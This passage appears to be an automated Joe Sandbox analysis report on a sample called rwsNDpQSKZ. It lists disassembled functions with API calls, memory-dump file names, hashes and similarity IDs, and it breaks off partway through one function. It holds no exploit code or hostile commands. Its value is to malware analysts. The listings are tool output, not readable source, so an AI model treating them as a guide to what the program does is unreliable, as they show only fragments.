                Download Yara Rule
                APIs
                • DeleteFileW.KERNEL32(?), ref: 00C6281E
                • GetTempPathW.KERNEL32(00000207,?), ref: 00C62834
                • GetTempFileNameW.KERNEL32(?,00D34CD0,00000000,?), ref: 00C62848
                • DeleteFileW.KERNEL32(?), ref: 00C62855
                • MoveFileW.KERNEL32(?,?), ref: 00C62863
                • DeleteFileW.KERNEL32(?), ref: 00C62874
                • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00C62888
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: File$Delete$MoveTemp$NamePath
                • String ID:
                • API String ID: 3002589313-0
                • Opcode ID: 4626ea02f0b6be9a327741cf38de23f7ca3005e9a31c93cab3adeeb6cfb98e1d
                • Instruction ID: 49db54ff8c8bb218434cb3796089d1abc91c3b3067bd5a5f00165e2c12b33f20
                • Opcode Fuzzy Hash: 4626ea02f0b6be9a327741cf38de23f7ca3005e9a31c93cab3adeeb6cfb98e1d
                • Instruction Fuzzy Hash: 8621D272A0061DABDB20DB65ED48EEF777CDB89704F0080A4AA05D3180DB34AB868B75
                Function 00D08533 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00D0827F: _free.LIBCMT ref: 00D082A4
                • _free.LIBCMT ref: 00D08581
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00D0858C
                • _free.LIBCMT ref: 00D08597
                • _free.LIBCMT ref: 00D085EB
                • _free.LIBCMT ref: 00D085F6
                • _free.LIBCMT ref: 00D08601
                • _free.LIBCMT ref: 00D0860C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 2247769d6c8754bfabb28c078bad5757b02527ee5bed5922298363181764292d
                • Instruction ID: b8683c8d6bbbe93c3b70e391cf35abd2c1261b0d32f23c73aeb5096a70197dd5
                • Opcode Fuzzy Hash: 2247769d6c8754bfabb28c078bad5757b02527ee5bed5922298363181764292d
                • Instruction Fuzzy Hash: A4117F31944B08EAD960B7B1CD07FDB779DAF20700F840815B2DD660A2EF35B544A7B5
                Function 00CB2060 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ ref: 00CB2071
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB2083
                  • Part of subcall function 00CB04A0: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00CB0AAA,?,?,?,00CB06F3,?,?,?,00CA56F2,00000000,000000B0,00CA5CDD,?,?), ref: 00CB04AB
                • ?Value@XMLNode@tinyxml2@@QBEPBDXZ.RWSNDPQSKZ ref: 00CB208C
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB2098
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ ref: 00CB20B3
                • ?GetStr@StrPair@tinyxml2@@QAEPBDXZ.RWSNDPQSKZ ref: 00CB20BD
                • ?StringEqual@XMLUtil@tinyxml2@@SA_NPBD0H@Z.RWSNDPQSKZ(00000000,00000000,7FFFFFFF), ref: 00CB20C9
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@Equal@Node@tinyxml2@@Pair@tinyxml2@@State@Str@StringUnlock@Util@tinyxml2@@Value@
                • String ID:
                • API String ID: 1383704807-0
                • Opcode ID: 82d8cd67d60e8fc996630c9fba7fbb9a9063f261558ba26131acecc25b8a78b5
                • Instruction ID: 2bf0ecf9d21538e5c52090afd923f2e387263d226ec763b794f187d5791d1c1e
                • Opcode Fuzzy Hash: 82d8cd67d60e8fc996630c9fba7fbb9a9063f261558ba26131acecc25b8a78b5
                • Instruction Fuzzy Hash: 0B016836A00301A78F14BB25AC819E67369AFC6378B250228EC2697796DF31FD41D7D0
                Function 00C5A986 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5A98D
                • std::_Lockit::_Lockit.LIBCPMT ref: 00C5A997
                • int.LIBCPMT ref: 00C5A9AE
                  • Part of subcall function 00C51CF1: std::_Lockit::_Lockit.LIBCPMT ref: 00C51D02
                  • Part of subcall function 00C51CF1: std::_Lockit::~_Lockit.LIBCPMT ref: 00C51D1C
                • std::_Facet_Register.LIBCPMT ref: 00C5A9E8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,00000008,00C59009,?,?,?,00000000,?,00000054,00C5748B,?,?,?,?,?), ref: 00C5A9F5
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C5AA08
                • Concurrency::cancel_current_task.LIBCPMT ref: 00C5AA15
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Cmm@@Concurrency::cancel_current_taskFacet_H_prolog3RegisterState@Unlock@
                • String ID:
                • API String ID: 3531389548-0
                • Opcode ID: 515e108213766e859eabc30477357cd5c9e4cf23882d35f52df523cb4b223c94
                • Instruction ID: b3e96b28cce4d1fae44ed7d13410da54a6b2fe2c9bc1725cfe9c668d9b06ba3a
                • Opcode Fuzzy Hash: 515e108213766e859eabc30477357cd5c9e4cf23882d35f52df523cb4b223c94
                • Instruction Fuzzy Hash: 6C01623990025A9BCB01EBA1C8157BDBB71BF40311F284108FC10AB3D1DF709E89EB55
                Function 00C66A45 Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C66A4C
                • std::_Lockit::_Lockit.LIBCPMT ref: 00C66A56
                • int.LIBCPMT ref: 00C66A6D
                  • Part of subcall function 00C51CF1: std::_Lockit::_Lockit.LIBCPMT ref: 00C51D02
                  • Part of subcall function 00C51CF1: std::_Lockit::~_Lockit.LIBCPMT ref: 00C51D1C
                • std::_Facet_Register.LIBCPMT ref: 00C66AA7
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,00000008,00C65279,00000001,?,00000000,00000001,00000010,00C62E91), ref: 00C66AB4
                • std::_Lockit::~_Lockit.LIBCPMT ref: 00C66AC7
                • Concurrency::cancel_current_task.LIBCPMT ref: 00C66AD4
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Cmm@@Concurrency::cancel_current_taskFacet_H_prolog3RegisterState@Unlock@
                • String ID:
                • API String ID: 3531389548-0
                • Opcode ID: d8d5a3bb3f50a67195892e84c722dbbe1607a62f55e55214ee8c87817303fed4
                • Instruction ID: a5aacdf9131662bbe4001539a072fc5d2e3b3a569c2247aff7682a794d6b89cd
                • Opcode Fuzzy Hash: d8d5a3bb3f50a67195892e84c722dbbe1607a62f55e55214ee8c87817303fed4
                • Instruction Fuzzy Hash: 6301C0359002699BCB11EBA4C8857BD7BB5FF40714F298419F811AB392DF709E45AB90
                Function 00CC09C0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CC09C7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3E0D4,00000030), ref: 00CC09DD
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • ?SplitString@?$CStringT@_W@Cmm@@QBE?AV?$vector@V?$CStringT@_W@Cmm@@V?$allocator@V?$CStringT@_W@Cmm@@@std@@@std@@ABV12@H@Z.RWSNDPQSKZ(?,?,00000001,00D3E0D4,00000030), ref: 00CC09F2
                  • Part of subcall function 00C53860: __EH_prolog3_GS.LIBCMT ref: 00C53867
                  • Part of subcall function 00C53860: ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 00C538EB
                  • Part of subcall function 00C53860: ??0?$CStringT@_W@Cmm@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.RWSNDPQSKZ(?,?,00000000,000000FF,?,00000000,?,?,?,?,00000034), ref: 00C5393F
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?TrimLeft@?$CStringT@_W@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,00D3E0D4,00000030), ref: 00CC0A14
                • ?TrimRight@?$CStringT@_W@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,00D3E0D4,00000030), ref: 00CC0A1B
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D34CD0,?,?,?,?,?,?,?,?,?,?,00D3E0D4,00000030), ref: 00CC0A34
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00D3E0D4,00000030), ref: 00CC0A4E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: String$Cmm@@$??0?$$H_prolog3_TrimU?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Cmm@@@std@@@std@@DeallocateH_prolog3Left@?$Right@?$SplitString@?$V01@@V12@V?$allocator@V?$vector@
                • String ID:
                • API String ID: 2979155003-0
                • Opcode ID: 1e5b749e0c4f17a3ceecc87e94bdfa4b1792e43976de968523fb8aaf598c0464
                • Instruction ID: c2dcb8fdea8fed39b66cd08b6f2d01419ce6c7eb6376ac58a7e75d02245a58a1
                • Opcode Fuzzy Hash: 1e5b749e0c4f17a3ceecc87e94bdfa4b1792e43976de968523fb8aaf598c0464
                • Instruction Fuzzy Hash: 8A01C035E01248EBCF04EB95E452AEDB734AF54315F008009F80177282DB745A89FBAA
                Function 00CB2590 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40COMMON
                Download Yara Rule
                APIs
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000004,00000000,filename=<null>,?,?,00CB3FAB,?,00000001,00000000,000001C4,00CA5C1C), ref: 00CB25A6
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ?Clear@XMLDocument@tinyxml2@@QAEXXZ.RWSNDPQSKZ(?,?,?,00CB3FAB,?,00000001,00000000,000001C4,00CA5C1C,?,?,?,?,?,0000003C), ref: 00CB25B1
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000003,00000000,filename=%s,00000000,?,?,?,00CB3FAB,?,00000001,00000000,000001C4,00CA5C1C), ref: 00CB25D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Document@tinyxml2@@$Error@Error@2@Pair@tinyxml2@@$Clear@Reset@Str@
                • String ID: filename=%s$filename=<null>
                • API String ID: 3203997174-1949359620
                • Opcode ID: f012b5708979b49bd7cb467a44cf5ea7ad6a211b9907856dfd9079bc56a5e1df
                • Instruction ID: 3d7a21b443904e970ae065c838b52c67bb8ca42a43e476ff1f3d2a242bc85eff
                • Opcode Fuzzy Hash: f012b5708979b49bd7cb467a44cf5ea7ad6a211b9907856dfd9079bc56a5e1df
                • Instruction Fuzzy Hash: 7CF0E2B220470077D6313959AC93FEB328D9B04B50F100025FA056B2C2EDA1AB4621B9
                Function 00C720C0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C720C7
                • ??0?$CmmMessageTemplate_3@HHH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.endvideo.notify,00009E73,EndType,ReasonCode,PTNotified,00000004), ref: 00C720EC
                  • Part of subcall function 00C8A780: __EH_prolog3.LIBCMT ref: 00C8A787
                  • Part of subcall function 00C8A780: ??0?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8A6A5,?,?,?,?,?,00000004,00C7CD68,?,?,?), ref: 00C8A79D
                  • Part of subcall function 00C915F2: __EH_prolog3_GS.LIBCMT ref: 00C915F9
                  • Part of subcall function 00C915F2: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91625
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91653
                  • Part of subcall function 00C915F2: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm,00000004), ref: 00C91690
                  • Part of subcall function 00C915F2: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp,OperateType,NeedUserConfirm), ref: 00C916C0
                  • Part of subcall function 00C915F2: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C70D21,com.Zoom.app.conf.operate.video.facility,FromApp,OperateType,NeedUserConfirm,com.Zoom.app.conf.operate.video.facility,0000277B,FromApp), ref: 00C9172C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@$Archive$H_prolog3MessagePackageStringTree@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@Tree
                • String ID: EndType$PTNotified$ReasonCode$com.zoom.app.cci.ccivideo.endvideo.notify
                • API String ID: 2610200052-2839026390
                • Opcode ID: 4c9e25a4c09e0cfc5faa08ac7d84ac1456e0d687e672055b717a5c52af146262
                • Instruction ID: 1c7b0722ea174673bffdc00e4788caf02dcd2dcddda9d6f93ed3f2ca29cb2b91
                • Opcode Fuzzy Hash: 4c9e25a4c09e0cfc5faa08ac7d84ac1456e0d687e672055b717a5c52af146262
                • Instruction Fuzzy Hash: A8F0E5B0B403917FD700AB449D06F2AA6B4F780B06F45802CB1406A3C1C6F08E04D3B6
                Function 00C6A260 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A267
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C6A28C
                  • Part of subcall function 00C88CE0: __EH_prolog3.LIBCMT ref: 00C88CE7
                  • Part of subcall function 00C88CE0: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C6A291,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88CFD
                  • Part of subcall function 00C88F0D: __EH_prolog3_GS.LIBCMT ref: 00C88F14
                  • Part of subcall function 00C88F0D: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F40
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88F6E
                  • Part of subcall function 00C88F0D: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value,00000004), ref: 00C88FAB
                  • Part of subcall function 00C88F0D: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name,Service,Value), ref: 00C88FDB
                  • Part of subcall function 00C88F0D: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,-00000004,?,00000050,00C6A2C1,com.zoom.app.UpdateFeatureToggle,Name,Service,Value,com.zoom.app.UpdateFeatureToggle,000027DB,Name), ref: 00C89047
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$CriticalEnterH000@H00@H_prolog3_Node@23@Root@SectionTemplate_2@Template_3@TreeV12@
                • String ID: Name$Service$Value$com.zoom.app.UpdateFeatureToggle
                • API String ID: 491978956-1326807880
                • Opcode ID: b36cd186945e082b9bb3a7a9d6b4de2607c9bd239d9ebcf6df2294b67253cda3
                • Instruction ID: 0cb3702f551444eea96ffb27efe5d4d6b5a57d3111e5fc018d2534a53bf981bd
                • Opcode Fuzzy Hash: b36cd186945e082b9bb3a7a9d6b4de2607c9bd239d9ebcf6df2294b67253cda3
                • Instruction Fuzzy Hash: 1AF0EDB4A40744BFE3107B80AC9EB2F2664EB84B48F500518B2006A3C5CBF40C48CBB8
                Function 00C6A460 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 27windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A467
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@V12@@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.notifyStartLogin,0000272E,Reason,MeetingID,Password,00000004), ref: 00C6A48C
                  • Part of subcall function 00C85460: __EH_prolog3.LIBCMT ref: 00C85467
                  • Part of subcall function 00C85460: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C85365,?,?,?,?,?,00000004,00C7FCD8,?,?,?), ref: 00C8547D
                  • Part of subcall function 00C88F0D: __EH_prolog3_GS.LIBCMT ref: 00C88F14
